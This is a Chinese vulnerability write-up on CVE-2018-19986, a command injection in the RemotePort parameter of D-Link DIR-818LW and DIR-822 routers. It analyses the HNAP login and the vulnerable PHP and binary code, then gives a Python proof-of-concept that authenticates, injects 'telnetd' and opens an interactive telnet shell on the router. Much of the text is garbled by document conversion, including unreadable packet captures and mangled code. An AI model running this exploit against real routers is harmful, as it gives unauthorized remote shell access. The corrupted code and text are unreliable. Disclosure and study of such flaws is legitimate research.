（CVE-2018-19986）D-Link DIR-818LW&828命令注入漏洞.docx

(CVE-2018-19986) D-Link DIR-818LW&828 命令注入漏洞一、漏洞简介D-LinkDIR-822和D-LinkDlR-818LW都是中国台湾友讯(D-Link)公司的一款无 线路由器。D-Link DIR-818LW Rev.A 2.05.B03 和 DIR-822 Bl 202KRb06 中的 RemOtePOM参数存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过 程中，网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法 命令。二、漏洞影响D-Link DIR-818LW Rev.A 2.05.B03DIR-822 Bl 202KRb06三、复现过程漏洞分析原理D-Link DIR-818LW Rev.A 2.05.B03 和 DIR-822 Bl 202KRb06 中,通过 HNAPl 协 议访问SetROUterSettingS时，RemOtePOrt参数存在操作系统命令注入漏洞。在 SetROllterSettings.php源码中，RemOtPOrt参数没有经过任何检查，直接存放于 $path_inf_wanl."web",并且在 iptwan.php 中的 IPTWAN_build_command 函数 中使用$Path_inf_wanl.7web"变量作为iptables的参数，同样未做检查。构造 SetRouterSettings.Xml,使 RemotePort 中包含如 telnetd 的 shell 命令，利用该 漏洞执行非法操作系统命令。./etc/templates/hnap/SetRouterSettings.php：$path_inf_wanl = XNODE_getpathbytarget(', “inf"，,'uid", $WAN1, 0);#$WAN1 = "WAN-1"；$nodebase="/runtime/hnap/SetRouterSettings/"JremotePort = query($nodebase."RemotePort");set($path_inf_wanl."web, JremotePort);./etc/services/IPTABLES/iptwan.phpfunction IPTWAN_build_command($name)$path = XNODE2getpathbytarget(',"i "inf", ,uid, $name, 0);$web = query ($path."/web");#web 作为 iptables 的参数写入$_GLOBALS“START” if (query($path.'7inbfilter") !=',")$inbfn = cut (query ($path. ,inbf ilter), 1, $hostip = query($path."weballowhostv4ip");if ($hostip !=",') if (query ($path. ,inbfilter") !="") fwrite( "a"$_GLOBALS"STARfwrite(,<a,j$_GLOBALS"START", $iptcmd." -s ".$hostip." -p tcT", $iptcmd." -p tcp -dport ".$web." ,.,-j CK-INBOUND". $inbf n., n");p -dport , .$web." -j ACCEPTn"); )elseif (query($path. ,inbfilter" )!=",) fwrite("a,$_GLOBALS"START,j $iptcmd." -p tcp -dport ".$web." ',.,-j CK_INBOUND". $inbf n. ,")；b." -j ACCEPTn");)fwrite( "a"i$_GLOBALS "START" , $iptcmd.', -p tcp -dport ". $wePS：服务器的Web目录为htdocsWeb/关于HNAPThe Home Network Administration Protocol (HNAP) is an HTTP-Simple Object Access Protocol (SOAP)-based protocol that can be implemented inside of network devices to allow advanced programmatic configuration and management by remote entities.HNAP是由PUreNetWorkS开发的协议，后续由CiSCo管理与开发。HNAP用于网 络设备之间的交互，该协议基于SOAP和HTTP,以PoSt的方式发包。使用HNAP：在HTTPheader中加入SOAPACtion,该字段中会指明请求的操作， 如Login,并向httpipHNAPl发送数据，数据形式为xml。举个栗子，下图是登录时的抓包：192.168.0.1向路由器192.168.0.2发送数据，在SOAPAction中指定了请求内容。路由器收到之后以LoginResponse回复发送方，返回了一些登录需要的关键数据. tr-> ¾: ,y" 布'(E M") . t< < i . ”,2*» (tfwt XIt Src：(Mie»:fa:la:91:W). Oil: M:9f:b3:M:M:4b (M:9f IWl »votcol Vrlon 4. Src: l2.1tt.l. 0(t: l2 IM ,2» TransBission Control Protocol. Src Port: M, Ost Port: 3S774r Sq: 48, Act W. Ln: S 口 ItMttwblM TO SMMt (2 byt> 27(M7). M<5H Rrot Tirawrer Rrocml HnX Kr Server SfYrMn Dt: frl, )1 0c ItM 2，3：“ 9rtf Tr<nsfr >Eoco0ing: CM-Z Cetnt-ty*: tatal; c*ar<utrWJ rMNTT* “on 1/1)Tiae sinc re*mt: M*3eN7 MCcMt)lMi: attp:/lW.1W. 1MU1).HTTP CaMlnE r*pon* FU CMa: 49 t>yt tmiM *Mrku* Languaye* <7aivc tln,2.*0MW9="utf-t*<Mp: EnVeIoPeZMto.tfS.<M2lVli<Ma lmCMaIaUS: x9FW/mmw. 9. org2W ITlMLScMm.ml*vM*M9*chMM. ml.0rfMMMX*9*<M9:tnwlope>发送方收到之后,login的action由request变成了 login,即发送用户名密码的过 程，密码是由用户私钥处理过的数据。1，"C*trl rtcL >rc ort: M7f. (M Agrt: N. tq: 1. Act. 1. I MtAcct*t-g tw. ru<ew AccF ： M_w，n*f . 一/： 0-& X HI ：0 . 一金 KNl石i6；0三6 二；;.wTJnTWr4* M<atl) I . VtAfl4tU eairf Content-Type： t*t*l; car>et4J-rAlawMltSS7.M (KNT¾. Hfe1卬 OtfBM.; H IvZJ W>» O br (l*4 Vll*)t MM4 Vyi C(5U (WlX IJTTTJ 4 J*t< 9EtMTIWt II. Brc:(M:tf »3.M:N:4t>). 0>t: ：3:“,:1:3 (:Intern< >Moc w<" 4. Sr¢: ：«i M .2. 0t IH IM .IM*A Alr; AOlAMMSOMMeaJKMSMTM22 1555MM7V C4l:7TM Content LMftMI 4NraraISU"MtP m 匕 1MW*11 HnFWimt 11 Rton 3 ftM 41j il Data: O bft9Htni RartMf UftfMfi CsaiWfUMMcI.*IgAfrFf路由器验证登录的用户名和密码，返回登录成功信息。 4 M *ytn wu (i blt> W by<e cap*vrd (4Y blt) m Iatefface (Mr<t II. Src "3 ;“：”：M ”：3 M：M « Mret rMl Wr>w> 4. $rc 1«； IM t. Dt: It? IM 2 Trani” Snteu PCcol, Src Hrt： M Dt RKt: X" X<: W5. Act: R LOT： * 0 ly3 TO ErH (W /”)： K(H) MSrvr< MK/verf> o(: *r M toe m n m” m Trfr inneing* ciw*e<vrVtH fyR tMtU; ar*"t,'2 VrM (MTT>1/11ITlM tlM HMetj .N)TCM WCM*) fMlJM! WfrM J4l iMPtTWr"Mt. . Nm t> cfUie4 r*p0Mtll tata: Itl toytt .RtElMt RirtUp LjRQMtl ”3WfSMR4t.aOnCMlJv*. Sf 6 A <wep f vw1o9 im : uy /-.sw*/2Mi/njcMM iMtM<o 3f9f <MNM S or fe: / V¾ScMb *!.+:"一*".:i<M aalMtf.«rf/i(aprawlHe><Mt ：理解HNAP为了再深入理解HNAP,查看htdocsCgibin二进制文件，简化流程如下：hnap_main()memset(acStackl708j0,0×100);getenv("HTTP_AUTHORIZATION");soapaction = getenv("HTTP_SOAPACTION");request_method = getenv("REQUEST_METHOD");hnap_auth = getenv( ',HTTP_HNAP_AUTH,);cookie = get en v (', HTTP_COOKI E "J;referer = getenv("HTTP-REFERER");memset (php_path,0,0x100);当未指定soapaction时，默认请求为GetDeviceSettingsif (soapaction = (char *)0×0) soapaction = "else_si = strstr(soapactionj" if (_si != (char *)0x0) parse-param-value(Var2j"Action ,action);parse-param-value(uar2j "Username",username);parse-param-value(Var2j"LoginPassword",pwd);parse-param-value(uVar2j"Captcha, captcha);iVarl = strcmp(action?"request");当 action 为 request 时if (iVarl = 0) 产生一个长度为0X32的随机字符串例：LVy04tz2fCRlZIu8vefr:LoCKU9qT0QaktWkw0hy3rNnQfhWaK Bget-random-string(random-stringj 0x32);COOkie_value为而十个字符例：LVy04tz2fCStrncpy(cookie_value,random-stringj10);/challenge为接下来20个字符7例：RlZIu8vefrlOCKu9qTOQStrncpy (random-challengej random_string_10,0x14);/public key切妾下来20个字符例：aktWkwOhySrNnQfhWaKBStrnCPy(PUbliJkey, random_string_30,0x14);sprintf (public_key_and_0j "%s%s' public_key,0);strcpy (CKIEj cookie_value);Strcpy(CHALLENGE,random_challenge);HMAjMD5就是常见的HMAC, hash算法为MD5。这里函数的输出 放在第三个参数中例：hmac_l=E188583458DE427B6A71C2DD04CB632CHMAjMD5 (rand Om.challenge, PUbIiJkey_and_0, hmac_l);/set challenge,privatekey,captcha返回 soap xml)end of action=request else(if(strcmp(actionj"login")=0 && cookie !=0)find_uid = strstr(cookie, ,uid=);if (find_uid = (char *)0x0) goto LAB_004137fc;获取cookie的值strncpy(cookie_value4find_uid + 4,10);检查 cookie_fd=get-cgdata-by-uid(acStackl904jcookie-value);if (_fd-< 0) iVarl = -2;goto LAB_004137fc;由HMAC计算口令，以hmac_l作为key,对challenge进行 hmacHMAJMD5 (CHALLENGE, hmac_l, PWD)；将计算的口令与发送方中的口令比较_fd = StrCmP(Char *)PWD,pwd);乔(_fd = 0) login_response_xml("success");)end of action=login /end of Login不是login的情况if (hnap_auth != (char *)0×0)/hnap_auth用空格分为两部分auth_l = strtok(hnap_auth/'");auth_2 = strtok(char *)0×0,",);将auth_2和soapaction连接起来 strcpy(auth_2_soapactionj auth_2); strcat(auth-2-soapactionj soapaction);HMAC_MD5(auth_2_SOaPaCtion,hmac_l,HMAC_AUTH);比聂auth_l而不算后的值_fd = strcmp(auth_l,HMAC_AUTH);if (_fd = 0) 如果不是Logout,就跳转到0×413330_format = strstr(soapactionj" HNAPlLogoutn);if (_format = (char *)0x0) goto LAB_00413330;)end of soapaction!=0LAB_00413330：在soapaction中查找最后一个'7”之后的内容为OPeratiOn_format = strrchr(soapaction,0×2f);operation = _format + 1;if (_format != (char *)0x0) sVar3 = Strlen(Operation);if (operationsVar3 - 1 = , ,) operationsVar3 - 1 = 0;/hnap 相关的 php 都在etctemplateshnap 下snprintf(php_path,0x100,"%s%s.php"j"etctemplateshnap",ope ration);判断与请求相关的PhP是否存在，。为存在iVarl = access(php_path,0);if (iVarl = 0) snprintf(acStackl708,0×100"%s%s.phpnShellPath=%s%s.shnPr ivateKey=%sn,etctemplateshnap" ,operation jvar-run,operation8D AT_00438344);sobj-add-string(iVar4jacStackl708);uVar2 = sobj_get_string();该函数会建立一个socket并把上面的acStackl708字符发送给socke t；这个SOCket是与本地的XmIdb_sock建立的，理解为发送给本地以执行对应的PhPXmIdbjePhP (00, UVar2, stdout);snprintf (acStackl708j0x100j ,%s,operation);iVar4 = FUN-004125c8(acStackl708j"/etc/templates/hnap/. she ll_action");/这里无论如何都会为format赋值，内容是执行一个Sh脚本的命令if (iVar4 = 0) _format = ',sh %s%s.sh > devconsole" 一else _format = "sh %s%s.sh > devconsole 一执行该脚本/var_run变量对应的字符是"varrun"snprintf(acStackl708j0×100j_format,&var_run,operation); system(acStackl708);)漏洞执行顺序在上面的hnap.main代码中，代入本漏洞SetRouterSettings的情况，最后会执行 sh varrunSetRouterSettings.sh,这个脚本是动态生成的，在模拟固件并执行poc成功之后查看内容(还没找到具体生成Sh脚本的代码)#!binshecho "$0->RouterSettings Change" > devconsoleevent DBSAVE > devconsoleservice HTTP.WAN-I start > devconsole #here! ! !xmldbc -s runtimehnapdev-status ,' > devconsoleHTTP.WAN-1 是一种服务，对应于etcservicesHTTP.WAN-l.php,该服务会开启IPT.WAN-1 服务<?include ,etcservicesHTTPhttpsvcs.php'*;fwrite("w"3START,#!binshn");fwrite("w", $STOP/'#!binshn");fwrite(,a',$START, "service IPT.WAN-I restartn") ;#here! ! !fwrite(Ha",$START/'service STUNNEL restartn,');httpsetup(,WAN-1");?>etcserviceslPT.WAN-l.php 会执行之前所说的 iptables 命令<?include ,htdocsphplibtrace.php"include ,etcservicesIPTABLESiptwan.php"IPTWAN_build_command("WAN-1");?>漏洞复现import requestsimport telnetlibfrom hashlib import md5import timeimport mathtrans_5C = "".join(chr(x 0×5c) for x in xrange(256)trans_36 = ,.join(chr(x A 0x36) for x in xrange(256)blocksize = md5().block_sizedef hmac-md5(keyj msg):if len(key) > blocksize:key = md5(key).digest()key += chr() * (blocksize - len(key)o_key_pad = key.translate(trans_5C)i_key_pad = key.translate(trans_36)return md5(o_key_pad + md5(i_key_pad + msg).digest()def HNAP_AUTH(SOAPAction, privateKey):b = math.floor(int(time.time() % 2000000000b = str(b):-2h = hmac_md5(privateKey, b + '"http:/HNAPl, + SO APAction + ,"").hexdigest().upper()return h + " " + b#输入IP和admin 口令，通过读hnap_main的二进制，理解初始状态admin的口令为空 (PUbli Jkey_0： 0 代表空值)IP = '192.168.0.1'admiPw =',command = ,telnetd" # command injection idheaders = requests. utils. default_headers()headers "User-Agent" = ""Mozilla5.0 (Windows NT 10.0; Win64; ×64) Appl eWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" headers"SOAPAction" = ," headers"Origin" = "http:/n + IPheaders"Referer" = "http:/" +IP + "infoLogin.html"headersnContent-Type" = ',textxml; Charset=UTF-8" headersX-Requested-With" = nXMLHttpRequestn#构造一个action为request的请求发送给Loginpayload = '<?xml version=,'1.0" encoding="utf-8"?><soap:Envelope xmlns:x si="http:/www.w3.org2001XMLSchema-instance" xmlns:×sd="http:/www.w3.org2001XMLSchema" xmlns:soap="http:/schemas.xmlsoap.org/soap/envelop e,><soap:BodyxLogin xmlns=" quest<Action><Username>Admin<Username><LoginPassword><LoginPassword> <Captcha><Captcha><Login><soapBody><soap:Envelope>'r = requests.post('httpz,+IP+,HNAPl', headers=headers data=payload) data = r.text#通过获取的publickey计算privatekey,根据privatekey计算口令的hmac(在上文 中对应的是hmac_l)challenge = str(datadata.find("<Challenge>") + 11: data.find("<Challe nge>n)cookie = data data .find (',<Cookie>") + 8: data.find(',<Cookie>")publicKey = str (data data. find(',<PublicKey>") + 11: data .find (',<Public Key>n)privateKey = hmac_md5(publicKey + adminPw, challenge).hexdigest().upper Opassword = hmac_md5(privateKey, challenge).hexdigest().upper()#构造action为IOgin的请求，发送用户名和口令headers"HNAP-ATH" = HNAP_AUTH("Login", privateKey)headers "Cookie" = ""uid=" + cookiepayload = ,<?xml version=,1.0" encoding="utf-8"?><soap:Envelope xmlns:x si=,http:/www.v3.org2001XMLSchema-instance" Xmlns:XSd="http:/www.w3. org2001XMLSchema" xmlns:soap=,http:/schemas.xmlsoap.org/soap/envelop e,"><soap:BodyxLogin xmlns=",HNAPl"><Action>lo gin<Action><Username>Admin<Username><LoginPassword>'+password+'<Logi nPassword><Captcha><Captcha><Login><soaprBody><soap:Envelope>,r = requests.post('http:/'+IP+'HNAP1,i headers=headersj data=payload)#登录成功后访问SetRouterSettings设置路由器的一些配置，其中RemotePort被设 置为 commandheaders "Origin" = "http: /, + IPheaders"HNAP_AUTH" = HNAP_AUTH("SetRouterSettings", privateKey)headers"SOAPaction" = ," gs,"headers"Accept" = ',text×ml"payload = open(,).xml,.format("CVE-2018-19986").read(). replace('ip', IP).replace('COMMAND', command) print ,* command injection'r = requests.post('http:/'+IP+'HNAP1,i headers=headersj data=payload) print(r.text)print ,* waiting 30 sec., time.sleep(30)#利用成功之后，服务端已经开启了 TeInet服务，攻击者可直接连服务器的Telnet print '* enjoy your shell,telnetlib.Telnet(IP).interact(